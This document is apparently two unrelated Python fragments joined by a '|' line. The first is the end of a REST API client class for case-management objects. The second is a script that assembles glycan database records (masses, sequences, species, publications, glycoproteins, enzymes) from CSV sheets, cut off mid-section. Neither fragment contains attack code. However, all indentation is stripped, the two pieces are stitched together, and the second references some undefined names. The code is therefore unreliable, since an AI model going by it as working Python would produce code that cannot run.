self._request(method, self.url(method, unique_id), body, params)
# update model
self.model = self.request.json().get('data')
return self.request
def log_response_text(self, response: Response):
"""Log the response text."""
response_text = 'response text: (text to large to log)'
if len(response.content) < 5000: # check size of content for performance
response_text = response.text
self.log.debug(f'feature=api-tc-v3, response-body={response_text}')
@property
def model(self) -> V3ModelABC:
"""Return the model data."""
return self._model
@model.setter
def model(self, data: dict | V3ModelABC):
"""Create model using the provided data."""
if isinstance(data, type(self.model)):
# provided data is already a model, nothing required to change
self._model = data
elif isinstance(data, dict):
# provided data is raw response, load the model
self._model = type(self.model)(**data)
else:
raise RuntimeError(f'Invalid data type: {type(data)} provided.')
@cached_property
def properties(self) -> dict[str, dict | list]:
"""Return defined API properties for the current object.
This property is used in testing API consistency.
"""
_properties = {}
try:
r = self._session.options(
self._api_endpoint,
params={'show': 'readOnly'},
headers={'content-type': 'application/json'},
)
if r.ok:
_properties = r.json()
except (ConnectionError, ProxyError):
handle_error(
code=951,
message_values=[
'OPTIONS',
407,
'{\"message\": \"Connection Error\"}',
self._api_endpoint,
],
)
return _properties
@staticmethod
def success(r: Response) -> bool:
"""Validate the response is valid.
Args:
r: The response object.
Returns:
bool: True if status is "ok"
"""
status = True
if r.ok:
try:
if r.json().get('status') != 'Success': # pragma: no cover
status = False
except Exception: # pragma: no cover
status = False
else:
status = False
return status
def update(self, mode: str | None = None, params: dict | None = None) -> Response:
"""Create or Update the Case Management object.
This is determined based on if the id is already present in the object.
"""
method = 'PUT'
body = self.model.gen_body_json(method=method, mode=mode)
params = self.gen_params(params) if params else None
# get the unique id value for id, xid, summary, etc ...
unique_id = self._calculate_unique_id().get('value')
# validate an id is available
self._validate_id(unique_id, self.url(method))
self._request(
method,
self.url(method, unique_id=unique_id),
body,
headers={'content-type': 'application/json'},
params=params,
)
# get the response data from nested data object or full response
response_json = self.request.json()
self.model = type(self.model)(**response_json.get('data'))
return self.request
def url(self, method: str, unique_id: int | str | None = None) -> str:
"""Return the proper URL."""
unique_id = unique_id or self._calculate_unique_id().get('value')
if method in ['DELETE', 'GET', 'PUT']:
return f'{self._api_endpoint}/{unique_id}'
return self._api_endpoint
|
#!/usr/bin/python
import os,sys
import string
from optparse import OptionParser
import csv
import json
import glob
from collections import OrderedDict
from Bio import SeqIO
from Bio.Seq import Seq
#import commands
import subprocess
import libgly
##################
def get_sort_key_value_pub(obj):
return obj["date"]
def get_sort_key_value_mut(obj):
return obj["ann_score"]
def get_sorting_key(obj):
return obj['sortorder']
def load_subsumption_heirarchy(in_file):
heirarchy_dict = {}
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
related_accession = tmp_row[tmp_fl.index("related_accession")]
relationship = tmp_row[tmp_fl.index("relationship")].lower()
glytoucan_type = tmp_row[tmp_fl.index("glytoucan_type")].lower()
gt_list = ["topology", "composition", "basecomposition"]
rl_list = ["ancestor", "descendant"]
if relationship in rl_list:
if main_id not in heirarchy_dict:
heirarchy_dict[main_id] = {}
if related_accession not in heirarchy_dict[main_id]:
heirarchy_dict[main_id][related_accession] = {}
heirarchy_dict[main_id][related_accession] = relationship
return heirarchy_dict
def load_motif_glytoucan_ac_list():
seen = {}
data_frame = {}
in_file = path_obj["reviewed"]+ "/glycan_motif.csv"
libgly.load_sheet(data_frame, in_file, ",")
f_list = data_frame["fields"]
for row in data_frame["data"]:
motif_ac_xref = row[f_list.index("motif_ac_xref")]
seen[motif_ac_xref] = True
return seen.keys()
def load_species_info(species_obj, species_list):
seen = {}
in_file = path_obj["misc"]+ "/species_info.csv"
libgly.load_species_info(species_obj, in_file)
species_obj_list = []
for k in sorted(species_obj, reverse=True):
obj = species_obj[k]
if obj["short_name"] not in seen and obj["is_reference"] == "yes":
o = {"shortname":obj["short_name"], "sortorder":obj["sort_order"]}
species_obj_list.append(o)
seen[obj["short_name"]] = True
species_obj_list.sort(key=get_sorting_key)
for o in species_obj_list:
species_list.append(o["shortname"])
return
def load_dictionaries(map_dict, misc_dir):
dict_list_obj = json.loads(open("conf/glycan_dictionaries.json", "r").read())
for dict_name in dict_list_obj:
map_dict[dict_name] = {}
ind_list = dict_list_obj[dict_name]["indexlist"]
for pattern in dict_list_obj[dict_name]["fileglob"]:
for in_file in glob.glob(misc_dir + pattern):
sheet_obj = {}
libgly.load_sheet(sheet_obj, in_file, ",")
for row in sheet_obj["data"]:
if row ==[] or row[ind_list[0]][0] == "#":
continue
key = row[ind_list[0]]
val = row[ind_list[1]]
if key not in map_dict[dict_name]:
map_dict[dict_name][key] = []
map_dict[dict_name][key].append(val)
return
def load_property_objlist(tmp_obj_dict,in_file, prop_dict,xref_info, combo_flist_one, combo_flist_two, anchor_field):
record_count = 0
local_seen_dict = {}
seen_dict = tmp_obj_dict["seen"]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", anchor_field)
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
if main_id.strip() == "":
continue
for tmp_row in data_frame["data"][main_id]:
combo_id = main_id
for f in combo_flist_one:
combo_id += "|" + tmp_row[tmp_fl.index(f)]
combo_id = combo_id.strip()
if combo_id not in local_seen_dict:
record_count += 1
local_seen_dict[combo_id] = True
obj_one = {}
for prop in prop_dict:
f = prop_dict[prop]
obj_one[prop] = tmp_row[tmp_fl.index(f)]
if prop == "do_id":
xref_key = tmp_row[tmp_fl.index(xref_info[0])]
xref_id = tmp_row[tmp_fl.index(xref_info[1])]
do_id = combo_id.split("|")[1]
obj_one[prop] = do_id
if do_id == "":
combo_id = "%s|%s-%s" % (main_id, xref_key.split("_")[-1], xref_id)
obj_one[prop] = "%s-%s" % (xref_key.split("_")[-1], xref_id)
database_label = tmp_row[tmp_fl.index("database_label")]
do_name = "%s [%s disease name]" % (database_label, xref_badge)
obj_one["name"] = do_name
obj_one["url"] = map_dict["xrefkey2url"]["protein_xref_do_placeholder"][0]
else:
do_name = doid2name[do_id][0]
obj_one["name"] = do_name[0].upper() + do_name[1:] + " [DO disease name]"
obj_one["url"] = map_dict["xrefkey2url"]["protein_xref_do"][0] % (do_id)
if "protein_xref_icd10cm" in doid2xrefid[do_id]:
obj_one["icd10"] = doid2xrefid[do_id]["protein_xref_icd10cm"][0]
if combo_id not in seen_dict:
seen_dict[combo_id] = True
tmp_obj_dict[combo_id] = obj_one
if combo_flist_two != []:
obj_one["evidence"] = []
if combo_flist_two != []:
xref_key = tmp_row[tmp_fl.index(xref_info[0])]
xref_id = tmp_row[tmp_fl.index(xref_info[1])]
xref_id = main_id if xref_id.strip() == "" else xref_id
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0]
if map_dict["xrefkey2url"][xref_key][0].find("%s") != -1:
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
obj_two = {"database":xref_badge, "id":xref_id, "url":xref_url}
combo_id_xref = combo_id
for f in combo_flist_two:
combo_id_xref += "|" + tmp_row[tmp_fl.index(f)]
combo_id_xref = combo_id_xref.strip()
if combo_id_xref not in seen_dict:
seen_dict[combo_id_xref] = True
tmp_obj_dict[combo_id]["evidence"].append(obj_two)
return record_count
def load_properity_list(tmp_obj_dict, in_file, field_list, sep):
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
if main_id not in tmp_obj_dict:
tmp_obj_dict[main_id] = []
for tmp_row in data_frame["data"][main_id]:
for k in field_list:
field_value = tmp_row[tmp_fl.index(k)].strip()
value_list = [field_value] if sep == "" else field_value.split(sep)
for value in value_list:
if value != "" and value not in tmp_obj_dict[main_id]:
tmp_obj_dict[main_id].append(value.strip())
return
def get_protein_info(protein_obj, info_type):
ret_val = ""
if info_type == "gene_name":
if protein_obj["gene"] != []:
ret_val = protein_obj["gene"][0]["name"]
elif info_type == "gene_url":
if protein_obj["gene"] != []:
ret_val = protein_obj["gene"][0]["url"]
elif info_type == "tax_id":
if protein_obj["species"] != []:
ret_val = protein_obj["species"][0]["taxid"]
elif info_type == "tax_name":
if protein_obj["species"] != []:
ret_val = protein_obj["species"][0]["name"]
elif info_type == "tax_common_name":
if protein_obj["species"] != []:
if "common_name" in protein_obj["species"][0]:
ret_val = protein_obj["species"][0]["common_name"]
elif info_type == "recommendedname":
if "protein_names" in protein_obj:
syn_list = []
for o in protein_obj["protein_names"]:
if o["type"] == "recommended":
ret_val = o["name"]
else:
syn_list.append(o["name"])
if ret_val == "" and syn_list != []:
ret_val = syn_list[0]
return ret_val
def load_protein_objects(file_name_list):
seen = {}
for file_name in file_name_list:
for patt in ["proteoform_glycosylation_sites", "protein_matrixdb", "glycan_enzyme"]:
if file_name.find(patt) != -1:
in_file = data_dir + "/%s.csv" % (file_name)
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "uniprotkb_canonical_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
seen[main_id] = True
canon_list = seen.keys()
protein_obj_dict = {}
for canon in canon_list:
protein_jsonfile = "jsondb/proteindb/%s.json" % (canon)
if os.path.isfile(protein_jsonfile) == False:
protein_obj_dict[canon] = {}
else:
protein_obj_dict[canon] = json.loads(open(protein_jsonfile,"r").read())
return protein_obj_dict
def update_record_stat(record_stat, file_name, prop_name, n, combo_list):
if file_name not in record_stat:
record_stat[file_name] = {"recordfields":combo_list}
if prop_name not in record_stat[file_name]:
record_stat[file_name][prop_name] = 0
record_stat[file_name][prop_name] += n
return
#######################################
def main():
usage = "\n%prog [options]"
parser = OptionParser(usage,version="%prog version___")
parser.add_option("-s","--sec",action="store",dest="sec",help="Object section")
(options,args) = parser.parse_args()
sec_name = options.sec
global config_obj
global path_obj
global species_obj
global map_dict
global data_dir
global misc_dir
global main_dict
config_file = "../conf/config.json"
config_obj = json.loads(open(config_file, "r").read())
path_obj = config_obj[config_obj["server"]]["pathinfo"]
data_dir = "reviewed/"
misc_dir = "generated/misc/"
file_name_list = []
ds_obj_list = json.loads(open(misc_dir + "/dataset-masterlist.json", "r").read())
for obj in ds_obj_list:
ds_name = obj["name"]
ds_format = obj["format"]
mol = obj["categories"]["molecule"]
if ds_name in ["homolog_alignments", "isoform_alignments"]:
continue
if obj["categories"]["species"] == []:
if obj["integration_status"]["status"] == "integrate_all":
if "glycan" in obj["target_objects"]:
file_name_list.append("%s_%s" % (mol, ds_name))
else:
sp_list_one = sorted(obj["categories"]["species"])
for species in sp_list_one:
if species not in obj["integration_status"]["excludelist"]:
if "glycan" in obj["target_objects"]:
file_name_list.append("%s_%s_%s" % (species, mol, ds_name))
sec_info = json.loads(open("generated/misc/glycan_sectioninfo.json", "r").read())
main_dict = {}
for sec in sec_info:
main_dict[sec] = {"seen":{}}
species_obj, species_list = {}, []
load_species_info(species_obj, species_list)
map_dict = {}
load_dictionaries(map_dict, misc_dir)
pattern_list = []
if sec_name != None:
pattern_list += sec_info[sec_name]["sheetlist"]
else:
for sec in sec_info:
pattern_list += sec_info[sec]["sheetlist"]
pattern_list = list(set(pattern_list))
residue_heirarchy = json.loads(open("generated/misc/residue_heirarchy.json", "r").read())
residue2class = {}
for c in residue_heirarchy:
for m in residue_heirarchy[c]:
residue2class[m] = c
fully_determined_list = []
data_frame = {}
in_file = "reviewed/glycan_fully_determined.csv"
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
fully_determined_list.append(main_id)
selected_file_name_list = []
for file_name in file_name_list:
cond_list = []
for pat in ["_protein_masterlist"] + pattern_list:
cond_list += [file_name.find(pat) != -1]
if list(set(cond_list)) != [False]:
selected_file_name_list.append(file_name)
#Check missing files
mising_files = []
for file_name in selected_file_name_list:
file_ext = "fasta" if file_name.find("protein_allsequences") != -1 else "csv"
in_file = "%s%s.%s" % (data_dir,file_name,file_ext)
if os.path.isfile(in_file) == False:
mising_files.append(in_file)
if mising_files != []:
print ("The following files are missing:")
print (json.dumps(mising_files, indent=4))
exit()
#print (json.dumps(selected_file_name_list, indent=4))
#exit()
#in_file = "%s%s" % (data_dir,"glycan_subsumption.csv")
#heirarchy_dict = load_subsumption_heirarchy(in_file)
protein_obj_dict = load_protein_objects(selected_file_name_list)
motif_glytoucan_ac_list = load_motif_glytoucan_ac_list()
record_stat = {}
file_idx = 1
file_count = len(selected_file_name_list)
main_obj_dict = {}
for file_name in selected_file_name_list:
in_file = "%s%s.csv" % (data_dir,file_name)
if os.path.isfile(in_file) == False:
print ("make-glycandb: file %s does NOT exist!" % (in_file))
sys.exit()
print ("make-glycandb: %s [%s/%s]" % (in_file, file_idx, file_count))
file_idx += 1
#--> glytoucan_ac
sheet_name = "glycan_masterlist"
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
if main_id in main_dict["glytoucan_ac"]:
continue
main_dict["glytoucan_ac"][main_id] = main_id
tmp_row = data_frame["data"][main_id][0]
mass = tmp_row[tmp_fl.index("glycan_mass")]
mass_pme = tmp_row[tmp_fl.index("glycan_permass")]
missing_score = tmp_row[tmp_fl.index("missing_score")]
number_monosaccharides_one = tmp_row[tmp_fl.index("monosaccharides")]
glycan_type = tmp_row[tmp_fl.index("glytoucan_type")]
if mass != "":
prop_name = "mass"
mass = round(float(tmp_row[tmp_fl.index("glycan_mass")]), 2)
main_dict[prop_name][main_id] = mass
combo_list = ["glytoucan_ac", "mass"]
update_record_stat(record_stat, file_name, prop_name, 1, combo_list)
if mass_pme != "":
prop_name = "mass_pme"
mass_pme = round(float(tmp_row[tmp_fl.index("glycan_permass")]), 2)
main_dict[prop_name][main_id] = mass_pme
combo_list = ["glytoucan_ac", "mass_pme"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
number_monosaccharides_two = number_monosaccharides_one.replace("+", "")
if number_monosaccharides_two.isdigit():
prop_name = "number_monosaccharides"
main_dict[prop_name][main_id] = int(number_monosaccharides_two)
combo_list = ["glytoucan_ac", "number_monosaccharides"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
if number_monosaccharides_one.find("+") != -1:
prop_name = "number_monosaccharides_suffix"
tmp_val = number_monosaccharides_one.replace(number_monosaccharides_two,"")
main_dict[prop_name][main_id] = tmp_val
combo_list = ["glytoucan_ac", "number_monosaccharides_suffix"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
if glycan_type != "":
prop_name = "glycan_type"
main_dict[prop_name][main_id] = glycan_type
combo_list = ["glytoucan_ac", "glycan_type"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
if missing_score != "":
prop_name = "missing_score"
main_dict[prop_name][main_id] = int(missing_score)
combo_list = ["glytoucan_ac", "missing_score"]
update_record_stat(record_stat, file_name, prop_name, 1,combo_list)
if main_dict[prop_name][main_id] == 0:
kw = "fully_determined"
if main_id not in main_dict["keywords"]:
main_dict["keywords"][main_id] = []
if kw not in main_dict["keywords"][main_id]:
main_dict["fully_determined"][main_id] = "yes"
main_dict["keywords"][main_id].append(kw)
#--> fully_determined
sheet_name = "fully_determined"
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
main_dict["fully_determined"][main_id] = "yes"
kw = "fully_determined"
if main_id not in main_dict["keywords"]:
main_dict["keywords"][main_id] = []
if kw not in main_dict["keywords"][main_id]:
main_dict["keywords"][main_id].append(kw)
#--> sequences
sheet_name = "_sequences_"
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
prop2field = {
"iupac":"sequence_iupac_extended",
"wurcs":"sequence_wurcs",
"glycoct":"sequence_glycoct",
"inchi":"sequence_inchi",
"smiles_isomeric":"sequence_smiles_isomeric",
"glycam":"sequence_glycam_iupac",
"byonic":"sequence_byonic",
"gwb":"sequence_gwb"
}
for main_id in data_frame["data"]:
tmp_row = data_frame["data"][main_id][0]
for p in prop2field:
field = prop2field[p]
if field in tmp_fl:
main_dict[p][main_id] = tmp_row[tmp_fl.index(field)]
combo_list = ["glytoucan_ac", field]
update_record_stat(record_stat, file_name, p, 1,combo_list)
if field == "sequence_inchi":
inchi_key = tmp_row[tmp_fl.index("inchi_key")]
url = map_dict["xrefkey2url"]["glycan_xref_inchi_key"][0]
url = url % (inchi_key)
o = {"key":inchi_key, "url":url}
main_dict["inchi_key"][main_id] = o
combo_list = ["glytoucan_ac", field]
update_record_stat(record_stat, file_name, "inchi_key", 1, combo_list)
#--> species
for sheet_name in ["glycan_species"]:
if file_name.find(sheet_name) != -1:
prop_name = "species"
prop_dict = {"taxid":"tax_id", "name":"tax_name", "annotation_category":"annotation_category"}
xref_info = ["xref_key", "xref_id"]
combo_flist_one = ["tax_id", "annotation_category"]
combo_flist_two = ["xref_key", "xref_id"]
load_obj = main_dict[prop_name]
n = load_property_objlist(load_obj,in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id, tax_id,ann_cat = combo_id.split("|")
if load_obj[combo_id]["annotation_category"] not in ["Direct","Subsumption"]:
load_obj[combo_id]["deleteflag"] = True
#load_obj[combo_id].pop("annotation_category")
if load_obj[combo_id]["taxid"] == "":
load_obj[combo_id]["taxid"] = -1
else:
common_name = species_obj[load_obj[combo_id]["taxid"]]["common_name"]
if common_name != "":
load_obj[combo_id]["common_name"] = common_name
load_obj[combo_id]["taxid"] = int(load_obj[combo_id]["taxid"])
#--> interactions
for sheet_name in ["protein_matrixdb"]:
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
prop_name = "interactions"
prop_dict = {"interactor_id":"uniprotkb_canonical_ac"}
xref_info = ["xref_key", "xref_id"]
combo_flist_one = ["uniprotkb_canonical_ac"]
combo_flist_two = ["xref_key", "xref_id"]
load_obj = main_dict[prop_name]
n = load_property_objlist(load_obj,in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "saccharide")
combo_list = ["uniprotkb_canonical_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
if combo_id.split("|")[1] == "":
load_obj[combo_id]["deleteflag"] = True
canon = combo_id.split("|")[1]
rec_name = ""
if canon in protein_obj_dict:
rec_name = get_protein_info(protein_obj_dict[canon], "recommendedname")
load_obj[combo_id]["interactor_type"] = "protein"
load_obj[combo_id]["interactor_name"] = rec_name
#--> publication
for sheet_name in ["glycan_citations_", "_proteoform_citations_"]:
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
prop_name = "publication"
prop_dict = {"title":"title",
"journal":"journal_name","date":"publication_date","authors":"authors"}
xref_info = ["src_xref_key", "src_xref_id"]
combo_flist_one = ["xref_key", "xref_id"]
combo_flist_two = ["src_xref_key", "src_xref_id"]
load_obj = main_dict[prop_name]
n = load_property_objlist(load_obj,in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id, xref_key, xref_id = combo_id.split("|")
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
load_obj[combo_id]["date"] = load_obj[combo_id]["date"].split(" ")[0]
xref_badge = map_dict["xrefkey2badge"][xref_key]
load_obj[combo_id]["reference"] = [
{
"type":xref_badge,
"id":xref_id,
"url":xref_url
}
]
#--> motifs
for sheet_name in ["glycan_motif"]:
if file_name.find(sheet_name) != -1:
prop_name = "motifs"
load_obj = main_dict[prop_name]
prop_dict = {"id":"motif_ac", "name":"motif_name", "synonym":"alternative_name",
"keywords":"keyword"}
combo_flist_one = ["motif_ac"]
xref_info = []
combo_flist_two = []
n = load_property_objlist(load_obj, in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
#--> glycoprotein
for sheet_name in ["proteoform_glycosylation_sites"]:
if file_name.find(sheet_name) != -1:
prop_name = "glycoprotein"
load_obj = main_dict[prop_name]
prop_dict = {"uniprot_canonical_ac":"uniprotkb_canonical_ac",
"start_pos":"glycosylation_site_uniprotkb",
"end_pos":"glycosylation_site_uniprotkb",
"residue":"amino_acid"
}
combo_flist_one = ["uniprotkb_canonical_ac", "glycosylation_site_uniprotkb"]
xref_info = ["xref_key", "xref_id"]
combo_flist_two = ["xref_key", "xref_id"]
if file_name.find("proteoform_glycosylation_sites_gptwiki") != -1:
xref_info = ["glycan_xref_key", "glycan_xref_id"]
combo_flist_two = ["glycan_xref_key", "glycan_xref_id"]
n = load_property_objlist(load_obj, in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "saccharide")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id, canon, aa_pos = combo_id.split("|")[:3]
if aa_pos.strip() == "":
if "start_pos" in load_obj[combo_id]:
load_obj[combo_id].pop("start_pos")
load_obj[combo_id].pop("end_pos")
load_obj[combo_id].pop("residue")
protein_obj = protein_obj_dict[canon]
if protein_obj == {}:
load_obj[combo_id]["deleteflag"] = True
continue
gene_name = get_protein_info(protein_obj, "gene_name")
rec_name = get_protein_info(protein_obj, "recommendedname")
tax_id = get_protein_info(protein_obj, "tax_id")
tax_name = get_protein_info(protein_obj, "tax_name")
load_obj[combo_id]["protein_name"] = rec_name
load_obj[combo_id]["gene_name"] = gene_name
load_obj[combo_id]["tax_id"] = tax_id
load_obj[combo_id]["tax_name"] = tax_name
if "start_pos" in load_obj[combo_id]:
s_pos_list = str(load_obj[combo_id]["start_pos"]).split("|")
e_pos_list = str(load_obj[combo_id]["end_pos"]).split("|")
load_obj[combo_id]["start_pos"] = int(s_pos_list[0])
load_obj[combo_id]["end_pos"] = int(e_pos_list[0])
if len(s_pos_list) > 1:
load_obj[combo_id]["alternate_start_pos_list"] = []
for p in s_pos_list[1:]:
load_obj[combo_id]["alternate_start_pos_list"].append(int(p))
if len(e_pos_list) > 1:
load_obj[combo_id]["alternate_end_pos_list"] = []
for p in e_pos_list[1:]:
load_obj[combo_id]["alternate_end_pos_list"].append(int(p))
if "residue" in load_obj[combo_id]:
r_list = load_obj[combo_id]["residue"].split("|")
load_obj[combo_id]["residue"] = r_list[0]
if len(r_list) > 1:
load_obj[combo_id]["alternate_residue_list"] = s_pos_list[1:]
#--> names
for sheet_name in ["glycan_names"]:
if file_name.find(sheet_name) != -1:
prop_name = "names"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
name = tmp_row[tmp_fl.index("glycan_name")]
domain = tmp_row[tmp_fl.index("glycan_name_domain")]
combo_id = "%s|%s|%s" % (main_id, name, domain)
load_obj[combo_id] = {"name":name, "domain":domain}
#if domain.lower() == "byonic":
# main_dict["byonic"][main_id] = name
#--> subsumption
for sheet_name in ["glycan_subsumption"]:
if file_name.find(sheet_name) != -1:
prop_name = "subsumption"
rs_dict = {
"ancestor":1,"basecomposition":1, "composition":1,"descendant":1,
"fullydetermined":1,"subsumedby":1,"subsumes":1,"topology":1,"leaf":1
}
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
related_accession = tmp_row[tmp_fl.index("related_accession")]
relationship = tmp_row[tmp_fl.index("relationship")].lower()
if relationship in rs_dict:
combo_id = "%s|%s|%s" % (main_id, related_accession,relationship)
o = {"related_accession":related_accession,"relationship":relationship}
load_obj[combo_id] = o
#glytoucan_type = tmp_row[tmp_fl.index("glytoucan_type")].lower()
#gt_list = ["topology", "composition", "basecomposition"]
#rl_list = ["ancestor", "descendant"]
#cond_one = main_id != related_accession
#cond_two = glytoucan_type == relationship
#cond_three = glytoucan_type in gt_list
#if cond_one and cond_two and cond_three:
# combo_id = "%s|%s|%s" % (main_id, related_accession,relationship)
# rl = ""
# if main_id in heirarchy_dict:
# if related_accession in heirarchy_dict[main_id]:
# rl = heirarchy_dict[main_id][related_accession]
# load_obj[combo_id] = {
# "id":related_accession,
# "type":glytoucan_type,
# "relationship":rl
# }
#--> residues
for sheet_name in ["glycan_enzyme"]:
if file_name.find(sheet_name) != -1:
prop_name = "residues"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
r_count = 1
for tmp_row in data_frame["data"][main_id]:
canon = tmp_row[tmp_fl.index("uniprotkb_canonical_ac")]
residue_id = tmp_row[tmp_fl.index("residue_id")]
residue_name = tmp_row[tmp_fl.index("residue_name")]
parent_residue_id = tmp_row[tmp_fl.index("parent_residue_id")]
attached_by = "rxn.%s" % (canon)
detached_by = ""
r = {"id":residue_id, "name":residue_name,
"attachedby":attached_by,
"detachedby":detached_by, "parentid":parent_residue_id}
combo_id = "%s|%s" % (main_id, r_count)
load_obj[combo_id] = r
r_count += 1
combo_list = ["glytoucan_ac", "residue_count"]
update_record_stat(record_stat, file_name, prop_name, len(load_obj.keys()), combo_list)
#--> enzyme
for sheet_name in ["glycan_enzyme"]:
if file_name.find(sheet_name) != -1:
prop_name = "enzyme"
load_obj = main_dict[prop_name]
prop_dict = {"uniprot_canonical_ac":"uniprotkb_canonical_ac"}
combo_flist_one = ["uniprotkb_canonical_ac"]
xref_info = []
combo_flist_two = []
n = load_property_objlist(load_obj, in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id, canon = combo_id.split("|")
protein_obj = protein_obj_dict[canon]
if protein_obj == {}:
continue
gene_name = get_protein_info(protein_obj, "gene_name")
rec_name = get_protein_info(protein_obj, "recommendedname")
gene_url = get_protein_info(protein_obj, "gene_url")
enzyme_tax_id = get_protein_info(protein_obj, "tax_id")
enzyme_tax_name = get_protein_info(protein_obj, "tax_name")
enzyme_tax_common_name = get_protein_info(protein_obj, "tax_common_name")
load_obj[combo_id]["protein_name"] = rec_name
load_obj[combo_id]["gene"] = gene_name
load_obj[combo_id]["gene_link"] = gene_url
load_obj[combo_id]["tax_id"] = enzyme_tax_id
load_obj[combo_id]["tax_name"] = enzyme_tax_name
load_obj[combo_id]["tax_common_name"] = enzyme_tax_common_name
xref_key = tmp_row[tmp_fl.index("xref_key")]
xref_id = tmp_row[tmp_fl.index("xref_id")]
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
ev_obj = {"id":xref_id, "database":xref_badge, "url":xref_url}
load_obj[combo_id]["evidence"] = [ev_obj]
#--> dictionary
for sheet_name in ["glycan_dictionary"]:
if file_name.find(sheet_name) != -1:
prop_name = "dictionary"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
o = {}
for f in tmp_fl:
if f in ["xref_id", "xref_key"]:
continue
o[f] = tmp_row[tmp_fl.index(f)]
o["synonymns"] = o["synonymns"].split("|")
xref_id = tmp_row[tmp_fl.index("xref_id")]
xref_key = tmp_row[tmp_fl.index("xref_key")]
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
o["evidence"] = [{"id":xref_id, "url":xref_url, "database":xref_badge}]
combo_id = "%s|%s|%s" % (main_id, xref_id, o["term"])
load_obj[combo_id] = o
#--> glycotree_pathways
for sheet_name in ["glycan_pathway_glycotree"]:
if file_name.find(sheet_name) != -1:
prop_name = "glycotree_pathways"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
val_dict = {}
for f in tmp_fl:
val_dict[f] = tmp_row[tmp_fl.index(f)]
o = {
"source":val_dict["source"],
"target":val_dict["target"],
"residue_affected": {
"id": val_dict["residue_id"],
"full_name": val_dict["residue_name"]
},
"enzymes":[]
}
combo_id = "%s|%s|%s" % (main_id, val_dict["source"], val_dict["target"])
load_obj[combo_id] = o
ac, tax_name = val_dict["enzyme_uniprotkb_ac"], val_dict["enzyme_tax_name"]
if ac != "":
oo = {"uniprotkb_ac":ac,"tax_name":tax_name}
load_obj[combo_id]["enzymes"].append(oo)
#--> crossref
for sheet_name in ["glycan_xref_"]:
if file_name.find(sheet_name) != -1:
prop_name = "crossref"
load_obj = main_dict[prop_name]
prop_dict = {"id":"xref_id"}
